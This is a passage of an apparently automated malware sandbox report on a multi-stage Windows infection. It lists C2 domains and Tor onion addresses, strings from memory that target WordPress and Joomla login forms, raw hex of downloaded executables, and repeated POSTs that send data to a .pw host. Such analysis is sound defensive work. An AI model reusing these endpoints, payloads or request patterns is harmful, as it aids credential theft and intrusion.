                      Source: Binary string: C:\budipi\jewicayemodu-nolu\19\rehoha75\loz-ru.pdb source: 4577.exe, 0000000D.00000002.2101175658.00000000005C5000.00000002.00000001.01000000.00000009.sdmp, 4577.exe, 0000000D.00000000.1954389234.00000000005C5000.00000002.00000001.01000000.00000009.sdmp, 4577.exe, 00000018.00000000.2100150075.00000000005C5000.00000002.00000001.01000000.00000009.sdmp, csrss.exe, 0000001F.00000002.2468399681.00000000005C5000.00000002.00000001.01000000.00000012.sdmp, csrss.exe, 0000001F.00000000.2280554714.00000000005C5000.00000002.00000001.01000000.00000012.sdmp, csrss.exe, 00000026.00000000.2463066301.00000000005C5000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: WindowsFormsApp2.pdbx source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: khZ:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: 3BD2.exe, 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmp, 3BD2.exe, 00000008.00000000.1930010886.0000000000426000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: System.pdb4 source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.Core.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: Z:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: 3BD2.exe, 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmp, 3BD2.exe, 00000008.00000000.1930010886.0000000000426000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 9D1E.exe, 00000019.00000002.2394782575.000000000769A000.00000004.08000000.00040000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2382443256.00000000060FB000.00000004.00000800.00020000.00000000.sdmp, 9D1E.exe, 00000019.00000002.2303391732.000000000551E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: WindowsFormsApp9.pdb source: E35F.exe, 0000001E.00000000.2271500419.0000000000D32000.00000002.00000001.01000000.00000011.sdmp
                      Source: Binary string: System.ni.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: spelling_bythe_rules_of_language.pdbX source: 9D1E.exe, 00000019.00000000.2171928326.0000000000FB2000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: Binary string: System.Core.ni.pdb source: WERA42F.tmp.dmp.29.dr
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00404399 FindFirstFileW,FindClose,SetLastError,CompareFileTime,8_2_00404399
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00403C8F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,8_2_00403C8F
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00403DA4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,8_2_00403DA4
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_0041EDD8 FindFirstFileExA,8_2_0041EDD8
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BD4A8 GetFileAttributesW,FindFirstFileW,FindClose,21_2_00007FF73D0BD4A8
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BC948 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00007FF73D0BC948
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0CB93C FindFirstFileW,Sleep,FindNextFileW,FindClose,21_2_00007FF73D0CB93C
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0CB5C0 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,21_2_00007FF73D0CB5C0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0CB418 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,21_2_00007FF73D0CB418
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C74F0 FindFirstFileW,FindNextFileW,FindClose,21_2_00007FF73D0C74F0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0834E0 FindFirstFileExW,21_2_00007FF73D0834E0
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C82BC FindFirstFileW,FindClose,21_2_00007FF73D0C82BC
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0BC498 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00007FF73D0BC498
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0C8370 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,21_2_00007FF73D0C8370
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ZooJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ViewersJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

                      Networking

                      barindex
                      Source: C:\Windows\explorer.exeNetwork Connect: 5.42.66.0 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 91.215.85.120 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.26.173 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 91.104.83.7 80Jump to behavior
                      Source: Malware configuration extractorURLs: blastechohackopeower.pw
                      Source: Malware configuration extractorURLs: goddirtybrilliancece.fun
                      Source: Malware configuration extractorURLs: drownthinsaltroutese.pw
                      Source: Malware configuration extractorURLs: http://goodfooggooftool.net/index.php
                      Source: Malware configuration extractorURLs: http://sulugilioiu19.net/index.php
                      Source: Malware configuration extractorURLs: http://selebration17io.io/index.php
                      Source: Malware configuration extractorURLs: http://vacantion18ffeu.cc/index.php
                      Source: Malware configuration extractorURLs: http://valarioulinity1.net/index.php
                      Source: Malware configuration extractorURLs: http://buriatiarutuhuob.net/index.php
                      Source: Malware configuration extractorURLs: http://cassiosssionunu.me/index.php
                      Source: unknownDNS query: name: pastebin.com
                      Source: 4577.exe, 00000018.00000002.2986069883.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
                      Source: csrss.exe, 00000026.00000002.2986522634.0000000000824000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Referer: X-Requested-With: XMLHttpRequest Content-Type: application/json;127.0.0.1:--ignore-missing-torrcect[] = --SOCKSPort--DataDirectory--bridgehttp://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/rep.phperr.php?&n=v=b=p=repsf=e=nocache=SEH exceptionSEHSTD: C++.dll4kPv6aJG8e\!update!sleep !regcheckcreateObjectwp-login.phpwp-admin/name="loginform"ionW[] = id="loginform"name="log"id="user_login"name="pwd"id="user_pass"administrator/administrator/index.php ] = id="form-login"action="/administrator= = id="mod-login-username"nd[] = name="username"id="mod-login-password" name="passwd"admin.phpDataLifesubactionusernamepasswordOK{
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^qEOPJOP/EZJQI6[4FTWK5B4PQQ8OHITH3EPMOVFLB4REWWD8[4MPDIL6PSWLVS[J00;QUUI`,^qEhttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,^qkhttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a388c8439LR^qd}L
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a388c8439?u=am9uZXM%3D&p=ODMwMDIx&i=MTkxLjk2LjIyNy4xNzY%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=TmV3IFlvcms%3D&t=RGVmYXVsdA%3D%3D4'^q4'^qt
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.0000000003464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a388c8439?u=am9uZXM=&p=ODMwMDIx&i=MTkxLjk2LjIyNy4xNzY=&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=TmV3IFlvcms=&t=RGVmYXVsdA==LR^q
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^qkhttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a388c8439
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000033F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^qkhttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/ef0e6c9136fd4b779a75726a388c8439
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 8990
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8990 -> 49797
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8990 -> 49797
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                      Source: Yara matchFile source: 42.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.0.E35F.exe.db8096.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.0.E35F.exe.d30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\E35F.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:49743 -> 78.46.174.72:9001
                      Source: global trafficTCP traffic: 192.168.2.4:49747 -> 185.220.101.23:30023
                      Source: global trafficTCP traffic: 192.168.2.4:49755 -> 88.198.112.25:9001
                      Source: global trafficTCP traffic: 192.168.2.4:49776 -> 178.17.170.13:9001
                      Source: global trafficTCP traffic: 192.168.2.4:49780 -> 47.254.134.152:9001
                      Source: global trafficTCP traffic: 192.168.2.4:49797 -> 195.66.87.105:8990
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Sun, 07 Jan 2024 04:30:05 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=0c5f04c7.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 28 38 65 ec 6c 59 0b bf 6c 59 0b bf 6c 59 0b bf 72 0b 9e bf 7d 59 0b bf 72 0b 88 bf 3e 59 0b bf 72 0b 8f bf 48 59 0b bf 4b 9f 70 bf 6b 59 0b bf 6c 59 0a bf 0b 59 0b bf 72 0b 81 bf 6d 59 0b bf 72 0b 9f bf 6d 59 0b bf 72 0b 9a bf 6d 59 0b bf 52 69 63 68 6c 59 0b bf 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a9 36 85 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 64 02 00 00 7a 02 00 00 00 00 00 23 22 00 00 00 10 00 00 00 80 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 9e 60 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc b6 02 00 50 00 00 00 00 a0 03 00 b8 7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 aa 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 62 02 00 00 10 00 00 00 64 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 40 00 00 00 80 02 00 00 42 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 97 00 00 00 d0 02 00 00 86 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 a1 01 00 00 00 70 03 00 00 02 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 64 6f 78 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 6f 70 65 00 00 00 41 02 00 00 00 90 03 00 00 04 00 00 00 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 7d 01 00 00 a0 03 00 00 7e 01 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 07 Jan 2024 04:30:27 GMTContent-Type: application/octet-streamContent-Length: 6775808Last-Modified: Wed, 03 Jan 2024 18:38:18 GMTConnection: keep-aliveETag: "6595a99a-676400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a a9 95 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 5a 67 00 00 08 00 00 00 00 00 00 3e 78 67 00 00 20 00 00 00 80 67 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 67 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 77 67 00 4b 00 00 00 00 80 67 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 67 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 58 67 00 00 20 00 00 00 5a 67 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 05 00 00 00 80 67 00 00 06 00 00 00 5c 67 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 67 00 00 02 00 00 00 62 67 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 78 67 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 62 67 00 c4 15 00 00 03 00 00 00 01 00 00 06 a8 27 00 00 81 3a 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00
                      Source: global trafficHTTP traffic detected: GET /tor_proxies HTTP/1.1Host: t.meConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /raw/z2fzAVz5 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /stld/ef0e6c9136fd4b779a75726a388c8439?u=am9uZXM%3D&p=ODMwMDIx&i=MTkxLjk2LjIyNy4xNzY%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=TmV3IFlvcms%3D&t=RGVmYXVsdA%3D%3D HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 111600Expect: 100-continueConnection: Keep-AliveData Raw: Data Ascii:
                      Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
                      Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                      Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox ViewJA3 fingerprint: 83d60721ecc423892660e275acc4dffd
                      Source: unknownDNS query: name: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19499Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 9609Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 629Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20435Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5436Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 787Host: drownthinsaltroutese.pw
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 564934Host: drownthinsaltroutese.pw
